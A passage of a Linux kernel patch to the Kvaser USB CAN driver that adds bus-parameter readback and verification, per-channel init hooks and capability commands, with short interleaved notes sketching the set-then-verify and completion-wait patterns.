+  * @dev_set_bittiming:		used for can.do_set_bittiming
++ * @dev_get_busparams:		readback arbitration busparams
+  * @dev_set_data_bittiming:	used for can.do_set_data_bittiming
++ * @dev_get_data_busparams:	readback data busparams
+  * @dev_get_berr_counter:	used for can.do_get_berr_counter
+  *
+  * @dev_setup_endpoints:	setup USB in and out endpoints
+  * @dev_init_card:		initialize card
++ * @dev_init_channel:		initialize channel
++ * @dev_remove_channel:		uninitialize channel
+  * @dev_get_software_info:	get software info
+  * @dev_get_software_details:	get software details
+  * @dev_get_card_info:		get card info
+@@ -140,12 +158,18 @@ struct kvaser_usb_net_priv {
+  */
+ struct kvaser_usb_dev_ops {
+ 	int (*dev_set_mode)(struct net_device *netdev, enum can_mode mode);
+-	int (*dev_set_bittiming)(struct net_device *netdev);
+-	int (*dev_set_data_bittiming)(struct net_device *netdev);
++	int (*dev_set_bittiming)(const struct net_device *netdev,
++				 const struct kvaser_usb_busparams *busparams);
++	int (*dev_get_busparams)(struct kvaser_usb_net_priv *priv);
++	int (*dev_set_data_bittiming)(const struct net_device *netdev,
++				      const struct kvaser_usb_busparams *busparams);
++	int (*dev_get_data_busparams)(struct kvaser_usb_net_priv *priv);
+ 	int (*dev_get_berr_counter)(const struct net_device *netdev,
+ 				    struct can_berr_counter *bec);
+ 	int (*dev_setup_endpoints)(struct kvaser_usb *dev);
+ 	int (*dev_init_card)(struct kvaser_usb *dev);
++	int (*dev_init_channel)(struct kvaser_usb_net_priv *priv);
++	void (*dev_remove_channel)(struct kvaser_usb_net_priv *priv);
+ 	int (*dev_get_software_info)(struct kvaser_usb *dev);
+ 	int (*dev_get_software_details)(struct kvaser_usb *dev);
+ 	int (*dev_get_card_info)(struct kvaser_usb *dev);
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
+index 802e27c0ecedb..3a2bfaad14065 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
+@@ -440,10 +440,6 @@ static int kvaser_usb_open(struct net_device *netdev)
+ 	if (err)
+ 		return err;
+ 
+-	err = kvaser_usb_setup_rx_urbs(dev);
+-	if (err)
+-		goto error;
+-
+ 	err = ops->dev_set_opt_mode(priv);
+ 	if (err)
+ 		goto error;
+@@ -534,6 +530,93 @@ static int kvaser_usb_close(struct net_device *netdev)
+ 	return 0;
+ }
+ 
++static int kvaser_usb_set_bittiming(struct net_device *netdev)
++{
++	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
++	struct kvaser_usb *dev = priv->dev;
++	const struct kvaser_usb_dev_ops *ops = dev->driver_info->ops;
++	struct can_bittiming *bt = &priv->can.bittiming;
++
++	struct kvaser_usb_busparams busparams;
++	int tseg1 = bt->prop_seg + bt->phase_seg1;
++	int tseg2 = bt->phase_seg2;
++	int sjw = bt->sjw;
++	int err = -EOPNOTSUPP;
++
++	busparams.bitrate = cpu_to_le32(bt->bitrate);
++	busparams.sjw = (u8)sjw;
++	busparams.tseg1 = (u8)tseg1;
++	busparams.tseg2 = (u8)tseg2;
++	if (priv->can.ctrlmode & CAN_CTRLMODE_3_SAMPLES)
++		busparams.nsamples = 3;
++	else
++		busparams.nsamples = 1;
++
++	err = ops->dev_set_bittiming(netdev, &busparams);
++	if (err)
++		return err;
++
++	err = kvaser_usb_setup_rx_urbs(priv->dev);
++	if (err)
++		return err;
++
++	err = ops->dev_get_busparams(priv);
++	if (err) {
++		/* Treat EOPNOTSUPP as success */
++		if (err == -EOPNOTSUPP)
++			err = 0;
++		return err;
++	}
++
++	if (memcmp(&busparams, &priv->busparams_nominal,
++		   sizeof(priv->busparams_nominal)) != 0)
++		err = -EINVAL;
++
++	return err;
++}
++
++static int kvaser_usb_set_data_bittiming(struct net_device *netdev)
++{
++	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
++	struct kvaser_usb *dev = priv->dev;
++	const struct kvaser_usb_dev_ops *ops = dev->driver_info->ops;
++	struct can_bittiming *dbt = &priv->can.data_bittiming;
++
++	struct kvaser_usb_busparams busparams;
++	int tseg1 = dbt->prop_seg + dbt->phase_seg1;
++	int tseg2 = dbt->phase_seg2;
++	int sjw = dbt->sjw;
++	int err;
++
++	if (!ops->dev_set_data_bittiming ||
++	    !ops->dev_get_data_busparams)
++		return -EOPNOTSUPP;
++
++	busparams.bitrate = cpu_to_le32(dbt->bitrate);
++	busparams.sjw = (u8)sjw;
++	busparams.tseg1 = (u8)tseg1;
++	busparams.tseg2 = (u8)tseg2;
++	busparams.nsamples = 1;
++
++	err = ops->dev_set_data_bittiming(netdev, &busparams);
++	if (err)
++		return err;
++
++	err = kvaser_usb_setup_rx_urbs(priv->dev);
++	if (err)
++		return err;
++
++	err = ops->dev_get_data_busparams(priv);
++	if (err)
++		return err;
++
++	if (memcmp(&busparams, &priv->busparams_data,
++		   sizeof(priv->busparams_data)) != 0)
++		err = -EINVAL;
++
++	return err;
++}
++
+ static void kvaser_usb_write_bulk_callback(struct urb *urb)
+ {
+ 	struct kvaser_usb_tx_urb_context *context = urb->context;
+@@ -684,6 +767,7 @@ static const struct ethtool_ops kvaser_usb_ethtool_ops_hwts = {
+ 
+ static void kvaser_usb_remove_interfaces(struct kvaser_usb *dev)
+ {
++	const struct kvaser_usb_dev_ops *ops = dev->driver_info->ops;
+ 	int i;
+ 
+ 	for (i = 0; i < dev->nchannels; i++) {
+@@ -699,6 +783,9 @@ static void kvaser_usb_remove_interfaces(struct kvaser_usb *dev)
+ 		if (!dev->nets[i])
+ 			continue;
+ 
++		if (ops->dev_remove_channel)
++			ops->dev_remove_channel(dev->nets[i]);
++
+ 		free_candev(dev->nets[i]->netdev);
+ 	}
+ }
+@@ -730,6 +817,7 @@ static int kvaser_usb_init_one(struct kvaser_usb *dev, int channel)
+ 	init_completion(&priv->start_comp);
+ 	init_completion(&priv->stop_comp);
+ 	init_completion(&priv->flush_comp);
++	init_completion(&priv->get_busparams_comp);
+ 	priv->can.ctrlmode_supported = 0;
+ 
+ 	priv->dev = dev;
+@@ -742,7 +830,7 @@ static int kvaser_usb_init_one(struct kvaser_usb *dev, int channel)
+ 	priv->can.state = CAN_STATE_STOPPED;
+ 	priv->can.clock.freq = dev->cfg->clock.freq;
+ 	priv->can.bittiming_const = dev->cfg->bittiming_const;
+-	priv->can.do_set_bittiming = ops->dev_set_bittiming;
++	priv->can.do_set_bittiming = kvaser_usb_set_bittiming;
+ 	priv->can.do_set_mode = ops->dev_set_mode;
+ 	if ((driver_info->quirks & KVASER_USB_QUIRK_HAS_TXRX_ERRORS) ||
+ 	    (priv->dev->card_data.capabilities & KVASER_USB_CAP_BERR_CAP))
+@@ -754,7 +842,7 @@ static int kvaser_usb_init_one(struct kvaser_usb *dev, int channel)
+ 
+ 	if (priv->can.ctrlmode_supported & CAN_CTRLMODE_FD) {
+ 		priv->can.data_bittiming_const = dev->cfg->data_bittiming_const;
+-		priv->can.do_set_data_bittiming = ops->dev_set_data_bittiming;
++		priv->can.do_set_data_bittiming = kvaser_usb_set_data_bittiming;
+ 	}
+ 
+ 	netdev->flags |= IFF_ECHO;
+@@ -772,17 +860,26 @@ static int kvaser_usb_init_one(struct kvaser_usb *dev, int channel)
+ 
+ 	dev->nets[channel] = priv;
+ 
++	if (ops->dev_init_channel) {
++		err = ops->dev_init_channel(priv);
++		if (err)
++			goto err;
++	}
++
+ 	err = register_candev(netdev);
+ 	if (err) {
+ 		dev_err(&dev->intf->dev, "Failed to register CAN device\n");
+-		free_candev(netdev);
+-		dev->nets[channel] = NULL;
+-		return err;
++		goto err;
+ 	}
+ 
+ 	netdev_dbg(netdev, "device registered\n");
+ 
+ 	return 0;
++
++err:
++	free_candev(netdev);
++	dev->nets[channel] = NULL;
++	return err;
+ }
+ 
+ static int kvaser_usb_probe(struct usb_interface *intf,
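
The two new kvaser_usb wrappers above implement a set-then-verify handshake: write the bus parameters, read them back from the firmware, and return -EINVAL if the device silently changed them. A generic sketch of that pattern, where dev_write_params()/dev_read_params() are stand-ins for the transport:

    #include <string.h>
    #include <errno.h>

    struct busparams {
    	unsigned int bitrate;
    	unsigned char tseg1, tseg2, sjw, nsamples;
    };

    /* hypothetical device I/O hooks */
    int dev_write_params(const struct busparams *p);
    int dev_read_params(struct busparams *p);

    static int set_and_verify(const struct busparams *want)
    {
    	struct busparams got;
    	int err;

    	err = dev_write_params(want);
    	if (err)
    		return err;

    	err = dev_read_params(&got);
    	if (err)
    		return err;

    	/* reject silent adjustment by the firmware */
    	if (memcmp(want, &got, sizeof(got)) != 0)
    		return -EINVAL;
    	return 0;
    }
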
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
+index 66f672ea631b8..f688124d6d669 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
+@@ -45,6 +45,8 @@ static const struct kvaser_usb_dev_cfg kvaser_usb_hydra_dev_cfg_rt;
+ 
+ /* Minihydra command IDs */
+ #define CMD_SET_BUSPARAMS_REQ			16
++#define CMD_GET_BUSPARAMS_REQ			17
++#define CMD_GET_BUSPARAMS_RESP			18
+ #define CMD_GET_CHIP_STATE_REQ			19
+ #define CMD_CHIP_STATE_EVENT			20
+ #define CMD_SET_DRIVERMODE_REQ			21
+@@ -196,21 +198,26 @@ struct kvaser_cmd_chip_state_event {
+ #define KVASER_USB_HYDRA_BUS_MODE_CANFD_ISO	0x01
+ #define KVASER_USB_HYDRA_BUS_MODE_NONISO	0x02
+ struct kvaser_cmd_set_busparams {
+-	__le32 bitrate;
+-	u8 tseg1;
+-	u8 tseg2;
+-	u8 sjw;
+-	u8 nsamples;
++	struct kvaser_usb_busparams busparams_nominal;
+ 	u8 reserved0[4];
+-	__le32 bitrate_d;
+-	u8 tseg1_d;
+-	u8 tseg2_d;
+-	u8 sjw_d;
+-	u8 nsamples_d;
++	struct kvaser_usb_busparams busparams_data;
+ 	u8 canfd_mode;
+ 	u8 reserved1[7];
+ } __packed;
+ 
++/* Busparam type */
++#define KVASER_USB_HYDRA_BUSPARAM_TYPE_CAN	0x00
++#define KVASER_USB_HYDRA_BUSPARAM_TYPE_CANFD	0x01
++struct kvaser_cmd_get_busparams_req {
++	u8 type;
++	u8 reserved[27];
++} __packed;
++
++struct kvaser_cmd_get_busparams_res {
++	struct kvaser_usb_busparams busparams;
++	u8 reserved[20];
++} __packed;
++
+ /* Ctrl modes */
+ #define KVASER_USB_HYDRA_CTRLMODE_NORMAL	0x01
+ #define KVASER_USB_HYDRA_CTRLMODE_LISTEN	0x02
+@@ -281,6 +288,8 @@ struct kvaser_cmd {
+ 		struct kvaser_cmd_error_event error_event;
+ 
+ 		struct kvaser_cmd_set_busparams set_busparams_req;
++		struct kvaser_cmd_get_busparams_req get_busparams_req;
++		struct kvaser_cmd_get_busparams_res get_busparams_res;
+ 
+ 		struct kvaser_cmd_chip_state_event chip_state_event;
+ 
+@@ -363,6 +372,10 @@ struct kvaser_cmd_ext {
+ 	} __packed;
+ } __packed;
+ 
++struct kvaser_usb_net_hydra_priv {
++	int pending_get_busparams_type;
++};
++
+ static const struct can_bittiming_const kvaser_usb_hydra_kcan_bittiming_c = {
+ 	.name = "kvaser_usb_kcan",
+ 	.tseg1_min = 1,
+@@ -840,6 +853,39 @@ static void kvaser_usb_hydra_flush_queue_reply(const struct kvaser_usb *dev,
+ 	complete(&priv->flush_comp);
+ }
+ 
++static void kvaser_usb_hydra_get_busparams_reply(const struct kvaser_usb *dev,
++						 const struct kvaser_cmd *cmd)
++{
++	struct kvaser_usb_net_priv *priv;
++	struct kvaser_usb_net_hydra_priv *hydra;
++
++	priv = kvaser_usb_hydra_net_priv_from_cmd(dev, cmd);
++	if (!priv)
++		return;
++
++	hydra = priv->sub_priv;
++	if (!hydra)
++		return;
++
++	switch (hydra->pending_get_busparams_type) {
++	case KVASER_USB_HYDRA_BUSPARAM_TYPE_CAN:
++		memcpy(&priv->busparams_nominal, &cmd->get_busparams_res.busparams,
++		       sizeof(priv->busparams_nominal));
++		break;
++	case KVASER_USB_HYDRA_BUSPARAM_TYPE_CANFD:
++		memcpy(&priv->busparams_data, &cmd->get_busparams_res.busparams,
++		       sizeof(priv->busparams_nominal));
++		break;
++	default:
++		dev_warn(&dev->intf->dev, "Unknown get_busparams_type %d\n",
++			 hydra->pending_get_busparams_type);
++		break;
++	}
++	hydra->pending_get_busparams_type = -1;
++
++	complete(&priv->get_busparams_comp);
++}
++
+ static void
+ kvaser_usb_hydra_bus_status_to_can_state(const struct kvaser_usb_net_priv *priv,
+ 					 u8 bus_status,
+@@ -1326,6 +1372,10 @@ static void kvaser_usb_hydra_handle_cmd_std(const struct kvaser_usb *dev,
+ 		kvaser_usb_hydra_state_event(dev, cmd);
+ 		break;
+ 
++	case CMD_GET_BUSPARAMS_RESP:
++		kvaser_usb_hydra_get_busparams_reply(dev, cmd);
++		break;
++
+ 	case CMD_ERROR_EVENT:
+ 		kvaser_usb_hydra_error_event(dev, cmd);
+ 		break;
+@@ -1522,15 +1572,58 @@ static int kvaser_usb_hydra_set_mode(struct net_device *netdev,
+ 	return err;
+ }
+ 
+-static int kvaser_usb_hydra_set_bittiming(struct net_device *netdev)
++static int kvaser_usb_hydra_get_busparams(struct kvaser_usb_net_priv *priv,
++					  int busparams_type)
++{
++	struct kvaser_usb *dev = priv->dev;
++	struct kvaser_usb_net_hydra_priv *hydra = priv->sub_priv;
++	struct kvaser_cmd *cmd;
++	int err;
++
++	if (!hydra)
++		return -EINVAL;
++
++	cmd = kcalloc(1, sizeof(struct kvaser_cmd), GFP_KERNEL);
++	if (!cmd)
++		return -ENOMEM;
++
++	cmd->header.cmd_no = CMD_GET_BUSPARAMS_REQ;
++	kvaser_usb_hydra_set_cmd_dest_he
++		(cmd, dev->card_data.hydra.channel_to_he[priv->channel]);
++	kvaser_usb_hydra_set_cmd_transid
++				(cmd, kvaser_usb_hydra_get_next_transid(dev));
++	cmd->get_busparams_req.type = busparams_type;
++	hydra->pending_get_busparams_type = busparams_type;
++
++	reinit_completion(&priv->get_busparams_comp);
++
++	err = kvaser_usb_send_cmd(dev, cmd, kvaser_usb_hydra_cmd_size(cmd));
++	if (err)
++		return err;
++
++	if (!wait_for_completion_timeout(&priv->get_busparams_comp,
++					 msecs_to_jiffies(KVASER_USB_TIMEOUT)))
++		return -ETIMEDOUT;
++
++	return err;
++}
++
++static int kvaser_usb_hydra_get_nominal_busparams(struct kvaser_usb_net_priv *priv)
++{
++	return kvaser_usb_hydra_get_busparams(priv, KVASER_USB_HYDRA_BUSPARAM_TYPE_CAN);
++}
++
++static int kvaser_usb_hydra_get_data_busparams(struct kvaser_usb_net_priv *priv)
++{
++	return kvaser_usb_hydra_get_busparams(priv, KVASER_USB_HYDRA_BUSPARAM_TYPE_CANFD);
++}
++
++static int kvaser_usb_hydra_set_bittiming(const struct net_device *netdev,
++					  const struct kvaser_usb_busparams *busparams)
+ {
+ 	struct kvaser_cmd *cmd;
+ 	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
+-	struct can_bittiming *bt = &priv->can.bittiming;
+ 	struct kvaser_usb *dev = priv->dev;
+-	int tseg1 = bt->prop_seg + bt->phase_seg1;
+-	int tseg2 = bt->phase_seg2;
+-	int sjw = bt->sjw;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+@@ -1538,11 +1631,8 @@ static int kvaser_usb_hydra_set_bittiming(struct net_device *netdev)
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_SET_BUSPARAMS_REQ;
+-	cmd->set_busparams_req.bitrate = cpu_to_le32(bt->bitrate);
+-	cmd->set_busparams_req.sjw = (u8)sjw;
+-	cmd->set_busparams_req.tseg1 = (u8)tseg1;
+-	cmd->set_busparams_req.tseg2 = (u8)tseg2;
+-	cmd->set_busparams_req.nsamples = 1;
++	memcpy(&cmd->set_busparams_req.busparams_nominal, busparams,
++	       sizeof(cmd->set_busparams_req.busparams_nominal));
+ 
+ 	kvaser_usb_hydra_set_cmd_dest_he
+ 		(cmd, dev->card_data.hydra.channel_to_he[priv->channel]);
+@@ -1556,15 +1646,12 @@ static int kvaser_usb_hydra_set_bittiming(struct net_device *netdev)
+ 	return err;
+ }
+ 
+-static int kvaser_usb_hydra_set_data_bittiming(struct net_device *netdev)
++static int kvaser_usb_hydra_set_data_bittiming(const struct net_device *netdev,
++					       const struct kvaser_usb_busparams *busparams)
+ {
+ 	struct kvaser_cmd *cmd;
+ 	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
+-	struct can_bittiming *dbt = &priv->can.data_bittiming;
+ 	struct kvaser_usb *dev = priv->dev;
+-	int tseg1 = dbt->prop_seg + dbt->phase_seg1;
+-	int tseg2 = dbt->phase_seg2;
+-	int sjw = dbt->sjw;
+ 	int err;
+ 
+ 	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
+@@ -1572,11 +1659,8 @@ static int kvaser_usb_hydra_set_data_bittiming(struct net_device *netdev)
+ 		return -ENOMEM;
+ 
+ 	cmd->header.cmd_no = CMD_SET_BUSPARAMS_FD_REQ;
+-	cmd->set_busparams_req.bitrate_d = cpu_to_le32(dbt->bitrate);
+-	cmd->set_busparams_req.sjw_d = (u8)sjw;
+-	cmd->set_busparams_req.tseg1_d = (u8)tseg1;
+-	cmd->set_busparams_req.tseg2_d = (u8)tseg2;
+-	cmd->set_busparams_req.nsamples_d = 1;
++	memcpy(&cmd->set_busparams_req.busparams_data, busparams,
++	       sizeof(cmd->set_busparams_req.busparams_data));
+ 
+ 	if (priv->can.ctrlmode & CAN_CTRLMODE_FD) {
+ 		if (priv->can.ctrlmode & CAN_CTRLMODE_FD_NON_ISO)
+@@ -1683,6 +1767,19 @@ static int kvaser_usb_hydra_init_card(struct kvaser_usb *dev)
+ 	return 0;
+ }
+ 
++static int kvaser_usb_hydra_init_channel(struct kvaser_usb_net_priv *priv)
++{
++	struct kvaser_usb_net_hydra_priv *hydra;
++
++	hydra = devm_kzalloc(&priv->dev->intf->dev, sizeof(*hydra), GFP_KERNEL);
++	if (!hydra)
++		return -ENOMEM;
++
++	priv->sub_priv = hydra;
++
++	return 0;
++}
++
+ static int kvaser_usb_hydra_get_software_info(struct kvaser_usb *dev)
+ {
+ 	struct kvaser_cmd cmd;
+@@ -2027,10 +2124,13 @@ kvaser_usb_hydra_frame_to_cmd(const struct kvaser_usb_net_priv *priv,
+ const struct kvaser_usb_dev_ops kvaser_usb_hydra_dev_ops = {
+ 	.dev_set_mode = kvaser_usb_hydra_set_mode,
+ 	.dev_set_bittiming = kvaser_usb_hydra_set_bittiming,
++	.dev_get_busparams = kvaser_usb_hydra_get_nominal_busparams,
+ 	.dev_set_data_bittiming = kvaser_usb_hydra_set_data_bittiming,
++	.dev_get_data_busparams = kvaser_usb_hydra_get_data_busparams,
+ 	.dev_get_berr_counter = kvaser_usb_hydra_get_berr_counter,
+ 	.dev_setup_endpoints = kvaser_usb_hydra_setup_endpoints,
+ 	.dev_init_card = kvaser_usb_hydra_init_card,
++	.dev_init_channel = kvaser_usb_hydra_init_channel,
+ 	.dev_get_software_info = kvaser_usb_hydra_get_software_info,
+ 	.dev_get_software_details = kvaser_usb_hydra_get_software_details,
+ 	.dev_get_card_info = kvaser_usb_hydra_get_card_info,
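
kvaser_usb_hydra_get_busparams() above is the usual completion-based request/response: arm a struct completion, send the command, and block with wait_for_completion_timeout() until the USB completion path calls complete(). A minimal sketch of the primitive, where my_send_cmd() and the 5 s budget are illustrative:

    #include <linux/completion.h>
    #include <linux/jiffies.h>
    #include <linux/errno.h>

    static DECLARE_COMPLETION(reply_done);

    static int my_send_cmd(void)
    {
    	/* stub standing in for the USB/transport write */
    	return 0;
    }

    static int my_request(void)
    {
    	int err;

    	reinit_completion(&reply_done);   /* arm before sending */

    	err = my_send_cmd();
    	if (err)
    		return err;

    	if (!wait_for_completion_timeout(&reply_done,
    					 msecs_to_jiffies(5000)))
    		return -ETIMEDOUT;
    	return 0;
    }

    /* called from the URB/IRQ completion path */
    static void my_reply_handler(void)
    {
    	complete(&reply_done);
    }
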
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_leaf.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_leaf.c
+index 19958037720f4..b423fd4c79890 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_leaf.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_leaf.c
+@@ -21,6 +21,7 @@
+ #include <linux/types.h>
+ #include <linux/units.h>
+ #include <linux/usb.h>
++#include <linux/workqueue.h>
+ 
+ #include <linux/can.h>
+ #include <linux/can/dev.h>
+@@ -56,6 +57,9 @@
+ #define CMD_RX_EXT_MESSAGE		14
+ #define CMD_TX_EXT_MESSAGE		15
+ #define CMD_SET_BUS_PARAMS		16
++#define CMD_GET_BUS_PARAMS		17
++#define CMD_GET_BUS_PARAMS_REPLY	18
++#define CMD_GET_CHIP_STATE		19
+ #define CMD_CHIP_STATE_EVENT		20
+ #define CMD_SET_CTRL_MODE		21
+ #define CMD_RESET_CHIP			24
+@@ -70,10 +74,13 @@
+ #define CMD_GET_CARD_INFO_REPLY		35
+ #define CMD_GET_SOFTWARE_INFO		38
+ #define CMD_GET_SOFTWARE_INFO_REPLY	39
++#define CMD_ERROR_EVENT			45
+ #define CMD_FLUSH_QUEUE			48
+ #define CMD_TX_ACKNOWLEDGE		50
+ #define CMD_CAN_ERROR_EVENT		51
+ #define CMD_FLUSH_QUEUE_REPLY		68
++#define CMD_GET_CAPABILITIES_REQ	95
++#define CMD_GET_CAPABILITIES_RESP	96
+ 
+ #define CMD_LEAF_LOG_MESSAGE		106
+ 
+@@ -83,6 +90,8 @@
+ #define KVASER_USB_LEAF_SWOPTION_FREQ_32_MHZ_CLK BIT(5)
+ #define KVASER_USB_LEAF_SWOPTION_FREQ_24_MHZ_CLK BIT(6)
+ 
++#define KVASER_USB_LEAF_SWOPTION_EXT_CAP BIT(12)
++
+ /* error factors */
+ #define M16C_EF_ACKE			BIT(0)
+ #define M16C_EF_CRCE			BIT(1)
+@@ -157,11 +166,7 @@ struct usbcan_cmd_softinfo {
+ struct kvaser_cmd_busparams {
+ 	u8 tid;
+ 	u8 channel;
+-	__le32 bitrate;
+-	u8 tseg1;
+-	u8 tseg2;
+-	u8 sjw;
+-	u8 no_samp;
++	struct kvaser_usb_busparams busparams;
+ } __packed;
+ 
+ struct kvaser_cmd_tx_can {
+@@ -230,7 +235,7 @@ struct kvaser_cmd_tx_acknowledge_header {
+ 	u8 tid;
+ } __packed;
+ 
+-struct leaf_cmd_error_event {
++struct leaf_cmd_can_error_event {
+ 	u8 tid;
+ 	u8 flags;
+ 	__le16 time[3];
+@@ -242,7 +247,7 @@ struct leaf_cmd_error_event {
+ 	u8 error_factor;
+ } __packed;
+ 
+-struct usbcan_cmd_error_event {
++struct usbcan_cmd_can_error_event {
+ 	u8 tid;
+ 	u8 padding;
+ 	u8 tx_errors_count_ch0;
+@@ -254,6 +259,28 @@ struct usbcan_cmd_error_event {
+ 	__le16 time;
+ } __packed;
+ 
++/* CMD_ERROR_EVENT error codes */
++#define KVASER_USB_LEAF_ERROR_EVENT_TX_QUEUE_FULL 0x8
++#define KVASER_USB_LEAF_ERROR_EVENT_PARAM 0x9
++
++struct leaf_cmd_error_event {
++	u8 tid;
++	u8 error_code;
++	__le16 timestamp[3];
++	__le16 padding;
++	__le16 info1;
++	__le16 info2;
++} __packed;
++
++struct usbcan_cmd_error_event {
++	u8 tid;
++	u8 error_code;
++	__le16 info1;
++	__le16 info2;
++	__le16 timestamp;
++	__le16 padding;
++} __packed;
++
+ struct kvaser_cmd_ctrl_mode {
+ 	u8 tid;
+ 	u8 channel;
+@@ -278,6 +305,28 @@ struct leaf_cmd_log_message {
+ 	u8 data[8];
+ } __packed;
+ 
++/* Sub commands for cap_req and cap_res */
++#define KVASER_USB_LEAF_CAP_CMD_LISTEN_MODE 0x02
++#define KVASER_USB_LEAF_CAP_CMD_ERR_REPORT 0x05
++struct kvaser_cmd_cap_req {
++	__le16 padding0;
++	__le16 cap_cmd;
++	__le16 padding1;
++	__le16 channel;
++} __packed;
++
++/* Status codes for cap_res */
++#define KVASER_USB_LEAF_CAP_STAT_OK 0x00
++#define KVASER_USB_LEAF_CAP_STAT_NOT_IMPL 0x01
++#define KVASER_USB_LEAF_CAP_STAT_UNAVAIL 0x02
++struct kvaser_cmd_cap_res {
++	__le16 padding;
++	__le16 cap_cmd;
++	__le16 status;
++	__le32 mask;
++	__le32 value;
++} __packed;
++
+ struct kvaser_cmd {
+ 	u8 len;
+ 	u8 id;
+@@ -293,14 +342,18 @@ struct kvaser_cmd {
+ 			struct leaf_cmd_softinfo softinfo;
+ 			struct leaf_cmd_rx_can rx_can;
+ 			struct leaf_cmd_chip_state_event chip_state_event;
+-			struct leaf_cmd_error_event error_event;
++			struct leaf_cmd_can_error_event can_error_event;
+ 			struct leaf_cmd_log_message log_message;
++			struct leaf_cmd_error_event error_event;
++			struct kvaser_cmd_cap_req cap_req;
++			struct kvaser_cmd_cap_res cap_res;
+ 		} __packed leaf;
+ 
+ 		union {
+ 			struct usbcan_cmd_softinfo softinfo;
+ 			struct usbcan_cmd_rx_can rx_can;
+ 			struct usbcan_cmd_chip_state_event chip_state_event;
++			struct usbcan_cmd_can_error_event can_error_event;
+ 			struct usbcan_cmd_error_event error_event;
+ 		} __packed usbcan;
+ 
+@@ -323,7 +376,10 @@ static const u8 kvaser_usb_leaf_cmd_sizes_leaf[] = {
+ 	[CMD_RX_EXT_MESSAGE]		= kvaser_fsize(u.leaf.rx_can),
+ 	[CMD_LEAF_LOG_MESSAGE]		= kvaser_fsize(u.leaf.log_message),
+ 	[CMD_CHIP_STATE_EVENT]		= kvaser_fsize(u.leaf.chip_state_event),
+-	[CMD_CAN_ERROR_EVENT]		= kvaser_fsize(u.leaf.error_event),
++	[CMD_CAN_ERROR_EVENT]		= kvaser_fsize(u.leaf.can_error_event),
++	[CMD_GET_CAPABILITIES_RESP]	= kvaser_fsize(u.leaf.cap_res),
++	[CMD_GET_BUS_PARAMS_REPLY]	= kvaser_fsize(u.busparams),
++	[CMD_ERROR_EVENT]		= kvaser_fsize(u.leaf.error_event),
+ 	/* ignored events: */
+ 	[CMD_FLUSH_QUEUE_REPLY]		= CMD_SIZE_ANY,
+ };
+@@ -337,7 +393,8 @@ static const u8 kvaser_usb_leaf_cmd_sizes_usbcan[] = {
+ 	[CMD_RX_STD_MESSAGE]		= kvaser_fsize(u.usbcan.rx_can),
+ 	[CMD_RX_EXT_MESSAGE]		= kvaser_fsize(u.usbcan.rx_can),
+ 	[CMD_CHIP_STATE_EVENT]		= kvaser_fsize(u.usbcan.chip_state_event),
+-	[CMD_CAN_ERROR_EVENT]		= kvaser_fsize(u.usbcan.error_event),
++	[CMD_CAN_ERROR_EVENT]		= kvaser_fsize(u.usbcan.can_error_event),
++	[CMD_ERROR_EVENT]		= kvaser_fsize(u.usbcan.error_event),
+ 	/* ignored events: */
+ 	[CMD_USBCAN_CLOCK_OVERFLOW_EVENT] = CMD_SIZE_ANY,
+ };
+@@ -365,6 +422,12 @@ struct kvaser_usb_err_summary {
+ 	};
+ };
+ 
++struct kvaser_usb_net_leaf_priv {
++	struct kvaser_usb_net_priv *net;
++
++	struct delayed_work chip_state_req_work;
++};
++
+ static const struct can_bittiming_const kvaser_usb_leaf_m16c_bittiming_const = {
+ 	.name = "kvaser_usb_ucii",
+ 	.tseg1_min = 4,
+@@ -606,6 +669,9 @@ static void kvaser_usb_leaf_get_software_info_leaf(struct kvaser_usb *dev,
+ 	dev->fw_version = le32_to_cpu(softinfo->fw_version);
+ 	dev->max_tx_urbs = le16_to_cpu(softinfo->max_outstanding_tx);
+ 
++	if (sw_options & KVASER_USB_LEAF_SWOPTION_EXT_CAP)
++		dev->card_data.capabilities |= KVASER_USB_CAP_EXT_CAP;
++
+ 	if (dev->driver_info->quirks & KVASER_USB_QUIRK_IGNORE_CLK_FREQ) {
+ 		/* Firmware expects bittiming parameters calculated for 16MHz
+ 		 * clock, regardless of the actual clock
+@@ -693,6 +759,116 @@ static int kvaser_usb_leaf_get_card_info(struct kvaser_usb *dev)
+ 	return 0;
+ }
+ 
++static int kvaser_usb_leaf_get_single_capability(struct kvaser_usb *dev,
++						 u16 cap_cmd_req, u16 *status)
++{
++	struct kvaser_usb_dev_card_data *card_data = &dev->card_data;
++	struct kvaser_cmd *cmd;
++	u32 value = 0;
++	u32 mask = 0;
++	u16 cap_cmd_res;
++	int err;
++	int i;
++
++	cmd = kzalloc(sizeof(*cmd), GFP_KERNEL);
++	if (!cmd)
++		return -ENOMEM;
++
++	cmd->id = CMD_GET_CAPABILITIES_REQ;
++	cmd->u.leaf.cap_req.cap_cmd = cpu_to_le16(cap_cmd_req);
++	cmd->len = CMD_HEADER_LEN + sizeof(struct kvaser_cmd_cap_req);
++
++	err = kvaser_usb_send_cmd(dev, cmd, cmd->len);
++	if (err)
++		goto end;
++
++	err = kvaser_usb_leaf_wait_cmd(dev, CMD_GET_CAPABILITIES_RESP, cmd);
++	if (err)
++		goto end;
++
++	*status = le16_to_cpu(cmd->u.leaf.cap_res.status);
++
++	if (*status != KVASER_USB_LEAF_CAP_STAT_OK)
++		goto end;
++
++	cap_cmd_res = le16_to_cpu(cmd->u.leaf.cap_res.cap_cmd);
++	switch (cap_cmd_res) {
++	case KVASER_USB_LEAF_CAP_CMD_LISTEN_MODE:
